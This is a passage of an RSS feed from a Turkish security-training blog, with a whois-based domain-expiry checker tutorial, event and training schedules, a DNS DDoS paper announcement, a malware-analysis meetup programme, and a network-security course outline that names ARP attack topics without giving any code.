<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Bilgi Güvenliği AKADEMİSİ Blog</title>
	<atom:link href="http://blog.bga.com.tr/feed" rel="self" type="application/rss+xml" />
	<link>http://blog.bga.com.tr</link>
	<description></description>
	<lastBuildDate>Sat, 04 Feb 2012 10:05:07 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Alan Adı Yenileme Sürelerinin Otomatik Kontrolü</title>
		<link>http://blog.bga.com.tr/genel/alan-adi-yenileme-surelerinin-otomatik-kontrolu</link>
		<comments>http://blog.bga.com.tr/genel/alan-adi-yenileme-surelerinin-otomatik-kontrolu#comments</comments>
		<pubDate>Sat, 04 Feb 2012 10:05:07 +0000</pubDate>
		<dc:creator>bga</dc:creator>
				<category><![CDATA[Genel]]></category>

		<guid isPermaLink="false">http://blog.bga.com.tr/?p=2406</guid>
		<description><![CDATA[DNS (Alan Adı Sistemi) dağıtık yapıda bir veritabanıdır. Bu yapı makina isimlerini IPv4 (ya da ipv6) adreslere ya da IPv4 adresleri makina isimlerine aynı şekilde IP adres bilgilerini makina isimlerine çevirmeye yarar. İnsanoğlu her ne kadar sayısal hafızaya sahip olsada erişilmek istenene siteye 50.22.202.162 gibi sayısal bir değer belki 3-5 site için uygulanabilir bir yöntem gibi görünsede [...]]]></description>
			<content:encoded><![CDATA[<p>DNS (Alan Adı Sistemi) dağıtık yapıda bir veritabanıdır. Bu yapı makina isimlerini IPv4 (ya da ipv6) adreslere ya da IPv4 adresleri makina isimlerine aynı şekilde IP adres bilgilerini makina isimlerine çevirmeye yarar. İnsanoğlu her ne kadar sayısal hafızaya sahip olsada erişilmek istenene siteye 50.22.202.162 gibi sayısal bir değer belki 3-5 site için uygulanabilir bir yöntem gibi görünsede günümüz internet dünyası düşünüldüğünde bunun ne kadar ütopik olduğu aşikardır. Bunun içindir ki alan adları bu erişim esnasında kullanılmaya başlanmış ve özellikle IPv6 geçişi ile bu daha da önem kazanacak gibi görünmektedir.</p>
<p>Bu yapıda en önemli adım ise alan adlarının kayıt sürelerinin dolması ile başlayan süreç olmaktadır. Her ne kadar bellek boyut/fiyat oranları artsada insan belleği aksine zamanla dolmakta ve yeni bilgilerin kalıcılığı azalmaktadır. Bu perspektiften bakıldığında yaşanabilecek en büyük sorunlardan bir tanesi sahip olunan alan adının geçerlilik süresinin dolması ve bunula başlayan süreçte alan adının yenilenmeyerek sahipliğinin kaybedilmesi olabilmektedir. Mevcut alan adına ait geçerlilik süresi linux sistemlerde bulunan whois komutu ile görülebilmektedir. Kullanımı whois domain adı şeklinde olmaktadır. Örnek bir kullanımı ve ilgili çıktı bölümü aşağıda belirtildiği gibi olmaktadır.<span id="more-2406"></span></p>
<blockquote><p># whois <a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL2JnYS5jb20udHIv" target=\"_blank\">bga.com.tr</a><br />
&#8230;<br />
&#8230;<br />
** Domain Servers:<br />
<a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL25zMS5iZ2EuY29tLnRyLw==" target=\"_blank\">ns1.bga.com.tr</a>    <a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=dGVsOjUwLjIyLjIwMi4xNjI=" target=\"_blank\">50.22.202.162</a><br />
<a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL25zMi5iZ2EuY29tLnRyLw==" target=\"_blank\">ns2.bga.com.tr</a>    <a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=dGVsOjUwLjIyLjIwMi4xNjI=" target=\"_blank\">50.22.202.162</a></p>
<p>** Additional Info:<br />
Created on&#8230;&#8230;&#8230;&#8230;..: 2010-Jun-01.<br />
Expires on&#8230;&#8230;&#8230;&#8230;..: 2012-May-31.</p></blockquote>
<p>Görüldüğü gibi alan adına dair geçerlilik süresi 2012 31 Mayıs tarihi ile dolmaktadır. Bu işlem ara ara el ile gerçeklenerek kontroller gerçekleştirilebilir. Ancak birden fazla alan adına sahip kişi yada kurumlar için bu işlem zahmetli olabilmekte, yenilenme ve sonrasındaki sürecinde geçirilmesi durumunda ilgili domain elden çıkabilmektedir. Bütün bu işlemleri otomatik olarak kontrol eden ve belirlenen sürenin kalmasından itibaren mail yolu ile bilgilendirme yapan yazılımın kullanımına dair ayrıntılar aşağıda görüldüğü gibi olmaktadır. Öncelikle yazılım BGA yazılım deposunden temin edilmelidir, yapılandırma dosyası ihtiyaca göre belirlenerek oluşturulmalı ve son olarak çalıştırma hakları verilerek belirli zamanlarda çalıştırılmalıdır.</p>
<blockquote><p># wget <a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL2N2cy5iZ2EuY29tLnRyL0RvbU91dC50Z3o=" target=\"_blank\">http://cvs.bga.com.tr/DomOut.<wbr>tgz</wbr></a><br />
# tar -zxvf DomOut.tgz</p></blockquote>
<p>Gerekli yazılımların temin edilerek kurulmasının ardından DomOut yapılandırması belirlenerek çalıştırılması sağlanabilmektedir.</p>
<blockquote><p># wget <a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL2VmZmJvdC5vcmcvbWVkaWEvZG93bmxvYWRzL2VsZW1lbnR0cmVlLTEuMi0yMDA0MDYxOC50YXIuZ3o=" target=\"_blank\">http://effbot.org/media/<wbr>downloads/elementtree-1.2-<wbr>20040618.tar.gz</wbr></wbr></a><br />
# tar -zxvf elementtree-1.2-20040618.tar.<wbr>gz<br />
# cd elementtree-1.2-20040618<br />
# python setup.py install</wbr></p></blockquote>
<p>Ardından DomOut paketi açılarak yapılandırma dosyası ihtiyaca göre oluşturulmalıdır.</p>
<blockquote><p># tar -zxvf DomOut.tgz</p></blockquote>
<p>Yazılım ile birlikte örnek bir yapılandırma dosyası gelmektedir. Dosya içeriği aşağıdaki gibi olmaktadır.</p>
<blockquote><p># cat DomOut.conf</p>
<p>&lt;?xml version=&#8221;1.0&#8243;?&gt;<br />
&lt;domout&gt;<br />
&lt;email&gt;<br />
&lt;server&gt;localhost&lt;/server&gt;<br />
&lt;default_mail_to&gt;<a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=bWFpbHRvOnV5YXJpQGJnYS5jb20udHI=" target=\"_blank\">uyari@bga.<wbr>com.tr</wbr></a>&lt;/default_mail_to&gt;<br />
&lt;sender&gt;<a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=bWFpbHRvOkRvbU91dEBiZ2EuY29tLnRy" target=\"_blank\">DomOut@bga.com.tr</a>&lt;/<wbr>sender&gt;<br />
&lt;/email&gt;</wbr></p>
<p>&lt;domain&gt;<br />
&lt;name&gt;<a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL2JnYS5jb20udHIv" target=\"_blank\">bga.com.tr</a>&lt;/name&gt;<br />
&lt;expire_day&gt;121&lt;/expire_day&gt;<br />
&lt;/domain&gt;</p>
<p>&lt;domain&gt;<br />
&lt;name&gt;<a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3NpYmVyZ3V2ZW5saWsub3JnLw==" target=\"_blank\">siberguvenlik.org</a>&lt;/name&gt;<wbr><br />
&lt;mail_to&gt;<a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=bWFpbHRvOmluZm9Ac2liZXJndXZlbmxpay5vcmc=" target=\"_blank\">info@siberguvenlik.<wbr>org</wbr></a>&lt;/mail_to&gt;<br />
&lt;expire_day&gt;378&lt;/expire_day&gt;<br />
&lt;/domain&gt;</wbr></p>
<p>&lt;/domout&gt;</p></blockquote>
<p>İlgili yapılandırma değerleri ve sonucunda yazılımın çalıştırılarak ürettiği mevcut çıktı aşağıdaki gibi olmaktadır.</p>
<p><strong>email:</strong> Bu bölümde e-postanın gönderilmesi işini kotaracak olan sunucu bilgileri yer almaktadır.<br />
domain: Bu bölümde geçerlilik süresi kontrolü yapılmak istenen alan adına ait bilgiler yer almaktadır. Burada dikkat edilmesi gereken husus her domain için ayrı ayrı e-posta belirtilebilmektedir. Eğer belirtilmezse email kısmında default_mail_to ile belirtilen e-posta adresi kullanılmaktadır. domain içerisinde mail_to ile belirtilen e-posta adresinin expire_day ile belirlenen parametreden önce olması gerekmektedir. expire_day parametresi en son belirtilen parametre olmalıdır. Örnek yapılandırma dosyası içerisinde belirtilen parametrelerin sırası ile oluşturulan yapıladırmalar sorunsuz çalışacaktır.</p>
<p>Örnek yapılandırma ile <a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL2JnYS5jb20udHIv" target=\"_blank\">bga.com.tr</a> alan adı geçerlilik süresinin 121 gün kalması itibari ile default_mail_to ile belirtilen e-posta adresine bilgilendirme mesajı gönderilecektir. Aynı şekilde <a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3NpYmVyZ3V2ZW5saWsub3JnLw==" target=\"_blank\">siberguvenlik.org</a> alan adı geçerlilik süresinin 378 gün kalması itibari ile mail_to ile belirtilen e-posta adresine bilgilendirme mesajı gönderilecektir.</p>
<blockquote><p>Betiğin çalıştırılması için ise aşağıdaki şekilde olmaktadır.<br />
#./DomOut.py -f DomOut.conf<br />
<a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL2JnYS5jb20udHIv" target=\"_blank\">bga.com.tr</a> -&gt; 120 -&gt; 121<br />
<a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3NpYmVyZ3V2ZW5saWsub3JnLw==" target=\"_blank\">siberguvenlik.org</a> -&gt; 377 -&gt; 378</p></blockquote>
<p>Sonuç olarak alan adına ait yönlendirmelerin doğru bir şekilde çalışabilmesi için öncelikle alan adı sahipliğinin doğru kişi veya kurumda olması gerekmektedir. Birden fazla alan adı geçerlilik süresinin kontrolü otomatik olarak DomOut yazılımı ile kolay bir şekilde gerçekleştirilebilmektedir.</p>
<p>Ömer ALBAYRAK</p>
 <img src="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?view=1&post_id=2406" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://blog.bga.com.tr/genel/alan-adi-yenileme-surelerinin-otomatik-kontrolu/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>BGA Şubat 2012 Eğitim ve Etkinlik Programı</title>
		<link>http://blog.bga.com.tr/duyurular/bga-subat-ayi-egitim-ve-etkinlik-programi</link>
		<comments>http://blog.bga.com.tr/duyurular/bga-subat-ayi-egitim-ve-etkinlik-programi#comments</comments>
		<pubDate>Thu, 02 Feb 2012 06:03:52 +0000</pubDate>
		<dc:creator>bga</dc:creator>
				<category><![CDATA[Duyurular]]></category>
		<category><![CDATA[eğitim]]></category>
		<category><![CDATA[emea intelligence]]></category>
		<category><![CDATA[etkinlik]]></category>

		<guid isPermaLink="false">http://blog.bga.com.tr/?p=2398</guid>
		<description><![CDATA[Şubat ayında aktif katılım göstereceğimiz etkinlikler ve eğitim programı aşağıdaki gibidir. Etkinlik ve eğitimlerden haberdar olmak için etkinlik@list.bga.com.tr adrsine boş bir e-posta gönderilmesi yeterli olacaktır. 2012 yılı detay eğitim takvimi  2012 yılı detay etkinlik takvimi  Şubat 2012 Etkinlikleri 2 Şubat 2012   Gelişim Platformu Bilgi Güvenliği Semineri 25 Şubat 2012 Siber Suç Aracı Olarak Kötücül [...]]]></description>
			<content:encoded><![CDATA[<p>Şubat ayında aktif katılım göstereceğimiz etkinlikler ve eğitim programı aşağıdaki gibidir. Etkinlik ve eğitimlerden haberdar olmak için etkinlik@list.bga.com.tr adrsine boş bir e-posta gönderilmesi yeterli olacaktır.</p>
<p><a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3d3dy5iZ2EuY29tLnRyL2VnaXRpbS10YWt2aW1pLw==">2012 yılı detay eğitim takvimi </a></p>
<p><a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3d3dy5iZ2EuY29tLnRyL2JpbGdpLWd1dmVubGlnaS1ha2FkZW1pc2ktZXRraW5saWtsZXJpLw==">2012 yılı detay etkinlik takvimi <span id="more-2398"></span></a></p>
<p><span style="text-decoration: underline;"><strong>Şubat 2012 Etkinlikleri</strong></span></p>
<p>2 Şubat 2012   <a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3d3dy5nZWxpc2ltcGxhdGZvcm11Lm9yZy8xOV83OTFfNzkxX1NpYmVyX2d1dmVubGlrX25lZGlyX25lZGVuX29uZW1saWRpcj8=">Gelişim Platformu Bilgi Güvenliği Semineri</a></p>
<p>25 Şubat 2012 <a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3d3dy5iZ2EuY29tLnRyL25ldHNlYy10b3BsdWx1ay1idWx1c21hc2ktc2liZXItc2F2YXMtYXJhY2ktb2xhcmFrLWtvdHVjdWwteWF6aWxpbWxhci8=">Siber Suç Aracı Olarak Kötücül Yazılımlar</a></p>
<p>29 Şubat 2012 <a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3d3dy5lbWVhLWludGVsbGlnZW5jZS5jb20=">Uluslararası İstihbarat Ve Gözetim Teknolojileri Konferansı (EMEA Intelligence)</a></p>
<p><span style="text-decoration: underline;"><strong>Şubat 2012 Eğitimleri</strong></span></p>
<p>10-12 Şubat 2012     <a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3d3dy5iZ2EuY29tLnRyL2FnLXZlLWd1dmVubGlrLXlvbmV0aWNpbGVyaS1pY2luLWxpbnV4LWVnaXRpbWktYW5rYXJhaXN0YW5idWwv">Ağ ve Güvenlik Yöneticileri için Linux Eğitimi (Ankara)</a></p>
<p>15-17 Şubat 2012     <a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3d3dy5iZ2EuY29tLnRyL3V5Z3VsYW1hbGktYWctZ3V2ZW5saWdpLWVnaXRpbWktYW5rYXJhaXN0YW5idWwv">Uygulamalı Ağ güvenliği Eğitimi (Ankara)</a></p>
<p>20-23 Şubat 2012     Network Forensics Eğitimi (Ankara)*</p>
<p>27 Şubat-02 Mart     <a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3d3dy5iZ2EuY29tLnRyL2JleWF6LXNhcGthbGktaGFja2VyLWMtZS1oLXY3LWVnaXRpbWktYW5rYXJhLTIv">Beyaz Şapkalı Hacker(C.E.H) Eğitimi (Ankara)</a></p>
 <img src="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?view=1&post_id=2398" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://blog.bga.com.tr/duyurular/bga-subat-ayi-egitim-ve-etkinlik-programi/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[Makale] DNS Hizmetine Yönelik Dos/DDoS Saldırıları</title>
		<link>http://blog.bga.com.tr/duyurular/makale-dns-hizmetine-yonelik-dosddos-saldirilari</link>
		<comments>http://blog.bga.com.tr/duyurular/makale-dns-hizmetine-yonelik-dosddos-saldirilari#comments</comments>
		<pubDate>Wed, 01 Feb 2012 12:18:01 +0000</pubDate>
		<dc:creator>bga</dc:creator>
				<category><![CDATA[DDoS Pentest]]></category>
		<category><![CDATA[Duyurular]]></category>
		<category><![CDATA[amplified dns]]></category>
		<category><![CDATA[dns anycast]]></category>
		<category><![CDATA[dns ddos]]></category>
		<category><![CDATA[root dns]]></category>

		<guid isPermaLink="false">http://blog.bga.com.tr/?p=2393</guid>
		<description><![CDATA[BGA ekibinden Huzeyfe ÖNAL&#8217;ın hazırladığı &#8220;DNS Hizmetine Yönelik Dos/DDoS Saldırıları&#8221; konulu  yazıya BGA belge deposuna eklenmiştir. İlgilenenler  http://www.bga.com.tr/calismalar/dns_ddos.pdf   adresinden yazıyı indirebilir.]]></description>
			<content:encoded><![CDATA[<p>BGA ekibinden Huzeyfe ÖNAL&#8217;ın hazırladığı &#8220;DNS Hizmetine Yönelik Dos/DDoS Saldırıları&#8221; konulu  yazıya BGA belge deposuna eklenmiştir.</p>
<p>İlgilenenler  <a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3d3dy5iZ2EuY29tLnRyL2NhbGlzbWFsYXIvZG5zX2Rkb3MucGRm">http://www.bga.com.tr/calismalar/dns_ddos.pdf </a>  adresinden yazıyı indirebilir.</p>
 <img src="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?view=1&post_id=2393" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://blog.bga.com.tr/duyurular/makale-dns-hizmetine-yonelik-dosddos-saldirilari/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Netsec Topluluk Buluşması/ Siber Savaş Aracı Olarak Kötücül Yazılımlar</title>
		<link>http://blog.bga.com.tr/genel/netsec-topluluk-bulusmasi-siber-savas-araci-olarak-kotucul-yazilimlar</link>
		<comments>http://blog.bga.com.tr/genel/netsec-topluluk-bulusmasi-siber-savas-araci-olarak-kotucul-yazilimlar#comments</comments>
		<pubDate>Mon, 30 Jan 2012 09:14:09 +0000</pubDate>
		<dc:creator>bga</dc:creator>
				<category><![CDATA[Duyurular]]></category>
		<category><![CDATA[Genel]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[netsec]]></category>
		<category><![CDATA[siber güvenlik]]></category>
		<category><![CDATA[siber savaş]]></category>
		<category><![CDATA[siber tehditler]]></category>

		<guid isPermaLink="false">http://blog.bga.com.tr/?p=2268</guid>
		<description><![CDATA[NetSec Ağ ve Bilgi Güvenliği Topluluğu 25 Şubat 2012′de &#8220;Siber Savaş Aracı Olarak Kötücül Yazılımlar&#8221; konusunda bilgi paylaşımı ve tanışma amaçlı Microsoft Türkiye sponsorluğunda  Bellevue Residence’da  buluşuyor. Buluşmada “Social Network Malware Attacks &#8211; Sosyal ortamlarda karşılaşılan kötücül yazılımlar”,  ”Android dünyasının zararlı yazılımları”,  ”Kötücül Yazılımlar (malware) analizinde kullanılan temel yöntem ve araçlar”, “Dinamik analiz araçlarının modern malware ile imtihanı”,  ve [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" title="Netsec Şubat" src="http://blog.bga.com.tr/wp-content/uploads/2012/01/netsec_subat.jpg" alt="" width="648" height="347" /></p>
<p><a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3d3dy5saWZlb3ZlcmlwLm5ldC9uZXRzZWMtbGlzdGVzaQ==">NetSec Ağ ve Bilgi Güvenliği Topluluğu</a> <strong>25 Şubat 2012′de &#8220;Siber Savaş Aracı Olarak Kötücül Yazılımlar&#8221; </strong>konusunda bilgi paylaşımı ve tanışma amaçlı <strong>Microsoft Türkiye </strong>sponsorluğunda  Bellevue Residence’da  buluşuyor.</p>
<p>Buluşmada “Social Network Malware Attacks &#8211; Sosyal ortamlarda karşılaşılan kötücül yazılımlar”,  ”Android dünyasının zararlı yazılımları”,  ”Kötücül Yazılımlar (malware) analizinde kullanılan temel yöntem ve araçlar”, “Dinamik analiz araçlarının modern malware ile imtihanı”,  ve “dünyada kötücül yazılımların yayılması ile ilgili olarak yapılan araştırma sonucu oluşan SIR raporu ” konulu 5 farklı sunum yapılacaktır.<span id="more-2268"></span></p>
<p><img title="Daha fazla..." src="http://blog.bga.com.tr/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" alt="" /></p>
<p>Buluşmanın temel amacı bilgi güvenliği sektörü çalışanlarının biraraya gelip tanışması, iş birliktelerini arttırması ve bilgi paylaşımıdır.</p>
<p><strong>Etkinlik CISSP sertifikası sahipleri için 4 CPE <a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL2Jsb2cuYmdhLmNvbS50ci9jaXNzcC0yL2Npc3NwLXNlcnRpZmlrYXNpLXNhaGlwbGVyaS1pY2luLWNwZS1wdWFuaS10b3BsYW1h">değerindedir</a>.</strong></p>
<table border="0">
<tbody>
<tr>
<td><strong>Etkinlik Adı</strong></td>
<td><strong>Netsec Topluluk Buluşması / Siber Savaş Aracı Olarak Kötücül Yazılımlar</strong></td>
</tr>
<tr>
<td><strong>Düzenleyen</strong></td>
<td><strong><a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3d3dy5saWZlb3ZlcmlwLm5ldC8=">NetSec Topluluğu</a>, </strong><strong><a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3d3dy5iZ2EuY29tLnRyLw==" target=\"_blank\">Bilgi Güvenliği AKADEMİSİ</a></strong></td>
</tr>
<tr>
<td><strong>Sponsor</strong></td>
<td><strong>Microsoft Türkiye</strong></td>
</tr>
<tr>
<td><strong>Tarih/Saat</strong></td>
<td> 25 Şubat 2012 Cumartesi Saat 12:30-17:00</td>
</tr>
<tr>
<td><strong>Yer</strong></td>
<td></td>
</tr>
<tr>
<td><strong>Kayıt</strong></td>
<td><a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3d3dy5saWZlb3ZlcmlwLm5ldC9rYXlpdC5odG1s" target=\"_blank\"><img class="alignleft" title="kayit" src="http://www.bga.com.tr/wp-content/uploads/2011/01/kayit.gif" alt="" width="171" height="52" /></a>Etkinliğe kayıt olmak şartıyla tüm bilgi güvenliği uzmanları, meraklıları katılabilir.</td>
</tr>
<tr>
<td><strong>Katılımcıya Kazançları</strong></td>
<td>
<ul>
<li>Sektör içinde çalışanlar ile tanışma, güncel siber tehditler konusunda bilgi alışverişi, iş birliği ve<br />
network oluşturma.</li>
</ul>
</td>
</tr>
<tr>
<td><strong>Hedef Kitle</strong></td>
<td>
<ul>
<li>Bilgi güvenliği yöneticileri</li>
<li>Ağ ve güvenlik mühendisleri</li>
<li>Hosting firmaları/ISP’ler</li>
<li>Telekom firmaları</li>
<li>Kamu kurum ve kuruluşları</li>
<li>Yazılımcılar</li>
</ul>
</td>
</tr>
<tr>
<td><strong>Ücret – Kontenjan</strong></td>
<td>Etkinliğimiz ücretsiz olup etkinlik için kontenjan sınırlıdır. Lütfen katılım durumunuz kesinse kayıt olunuz.</td>
</tr>
<tr>
<td><strong>Etkinlik Programı</strong></td>
<td>
<ul>
<li><strong>12:30-13:00 </strong>Tanışma ve Etkinlik Açılış Konuşması</li>
</ul>
<ul>
<li><strong>13:00-13:30</strong> Microsoft Security Intelligence Report (SIR)</li>
</ul>
<ul>
<li><strong>13:30-14:15 </strong>Malware Analizinde Kullanılan Temel Yöntem ve Araçlar<br />
<strong>                       Huzeyfe ÖNAL / BGA</strong></li>
<li><strong><strong>14:15-14:30</strong> ARA</strong></li>
</ul>
<ul>
<li><strong>14:30-15:15 </strong>Android Zararlı Yazılım Analizi<br />
<strong>                      Mert SARICA /IBTech</strong></li>
</ul>
<ul>
<li><strong>15:15-16:00 </strong>Social Network Malware Attacks<br />
<strong>                      Halil ÖZTÜRKCİ / ADEO</strong></li>
<li><strong><strong>16:00-16:15</strong> ARA</strong></li>
</ul>
<ul>
<li><strong>16:15-17:00 </strong>Dinamik Analiz Araçlarının Modern Malware ile İmtihanı<br />
<strong>                      Osman PAMUK / TÜBİTAK</strong></li>
</ul>
<p>&nbsp;</td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>
<hr />
<p>İletişim için lütfen <strong> bilgi@lifeoverip.net </strong>adresine e-posta gönderiniz..</p>
<p><span style="text-decoration: underline;"><strong>Ulaşım</strong></span></p>
<p>Bellevue Residence Levent Mahallesi, Aydın Sokak. No:7 Levent, 34340 İstanbul/Türkiye</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><em>NetSec Topluluğu Hakkında: <a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL2Jsb2cubGlmZW92ZXJpcC5uZXQvbmV0c2VjLWxpc3Rlc2kv">http://www.lifeoverip.net/netsec-listesi/</a></em></p>
 <img src="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?view=1&post_id=2268" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://blog.bga.com.tr/genel/netsec-topluluk-bulusmasi-siber-savas-araci-olarak-kotucul-yazilimlar/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Uygulamalı Ag Güvenliği Eğitimi İçeriği Güncellendi: V4</title>
		<link>http://blog.bga.com.tr/genel/uygulamali-ag-guvenligi-egitimi-icerigi-guncellendi-v4</link>
		<comments>http://blog.bga.com.tr/genel/uygulamali-ag-guvenligi-egitimi-icerigi-guncellendi-v4#comments</comments>
		<pubDate>Sun, 29 Jan 2012 13:56:25 +0000</pubDate>
		<dc:creator>bga</dc:creator>
				<category><![CDATA[Duyurular]]></category>
		<category><![CDATA[Genel]]></category>

		<guid isPermaLink="false">http://blog.bga.com.tr/?p=2305</guid>
		<description><![CDATA[Bilgi Güvenliği AKADEMİSİ tarafından verilen Uygulamalı Ağ Güvenliği eğitiminin yeni versiyonu Ocak 2012  itibariyle hazır durumdadır. Uygulamalı Ağ Güvenliği eğitimi V4 içeriği aşağıdaki gibidir. Şubat-Mart aylarında açılacak Uygulamalı Ağ Güvenliği eğitimleri yeni içerikten sunulacaktır. Eğitim notlarında da ciddi güncellemeler yapılmıştır. Daha önce aynı eğitime katılan öğrencilerimiz baskı ücreti karşılığında yeni notları BGA ofisinden edinebilirler. 1)Ağ [...]]]></description>
			<content:encoded><![CDATA[<div>Bilgi Güvenliği AKADEMİSİ tarafından verilen Uygulamalı Ağ Güvenliği eğitiminin yeni versiyonu Ocak 2012  itibariyle hazır durumdadır.</div>
<div></div>
<div>Uygulamalı Ağ Güvenliği eğitimi V4 içeriği aşağıdaki gibidir. Şubat-Mart aylarında açılacak Uygulamalı Ağ Güvenliği eğitimleri yeni içerikten sunulacaktır. Eğitim notlarında da ciddi güncellemeler yapılmıştır. Daha önce aynı eğitime katılan öğrencilerimiz baskı ücreti karşılığında yeni notları BGA ofisinden edinebilirler.</div>
<div><strong><strong><br />
1)Ağ Güvenliği için Temel TCP/IP Bilgisi  </strong></strong></div>
<div>
<ul>
<li>OSI Katmanı ve İşlevleri<span id="more-2305"></span></li>
<li>TCP/IP Protokol Ailesi</li>
<li>TCP/IP ve OSI Karşılaştırması</li>
<li>TCP/IP Ağlarda Veri Formatları</li>
<li>Temel Ağ Cihazları ve Görevleri</li>
<li>İkili ve Onluk Sistemde IP Adresleri</li>
<li>Nibble Kavramı</li>
<li>Ethernet Ağlarda Mac Adresleri ve Görevleri</li>
<li>IP Adresleri Hakkında Temel Bilgiler</li>
<li>Port Kavramı ve TCP/UDP Portları</li>
<li>Sık Kullanılan Portlar ve İşlevleri</li>
<li>Bir Paketin Yaşam Döngüsü</li>
</ul>
<p>&nbsp;</p>
<p><strong>2)Hping, Netcat Kullanım Örnekleri &#8211; Pratik</strong></p>
<p><strong>3)TCP/IP Protokolleri ve Güvenlik Zafiyetleri</strong><br />
<strong>4)ARP  Protokolü ve Güvenlik Zafiyetleri</strong></p>
<ul>
<li>Address Resolution Protocol</li>
<li>Yeni Nesil ARP Protokolü -NDP(IPv6)</li>
<li>ARP Protokolü Başlık Bilgisi</li>
<li>ARP Çalışma Mantığı</li>
<li>ARP Paket Çeşitleri</li>
<li>Arp Request, Reply, RARP Request, RARP Reply</li>
<li>Gratious ARP Paketleri ve Kullanım Alanları</li>
<li>Proxy ARP Kavramı</li>
<li>Güvenlik Açısından ARP&#8217;ın Önemi</li>
<li>ARP Protokolüne Dayalı L2 Saldırıları</li>
<li>Kablosuz Ağlarda ARP  ve Çalışma Yapısı</li>
<li>ARP Saldırıları</li>
<li>ARP Cahce Poisoning</li>
<li>ARP Spoofing</li>
<li>ARP Poison Routing</li>
<li>Saldırı Mantığı</li>
<li>Saldırı için Kullanılan Araçlar (Windows/Linux)</li>
<li>Arpspoof, Nemesis, Ettercap, Cain&amp;Abel</li>
<li>Arp Spoof Sonrası Gerçekleştirilen Ataklar</li>
<li>Yerel Ağlarda ARP Kullanarak DoS Gerçekleştirme</li>
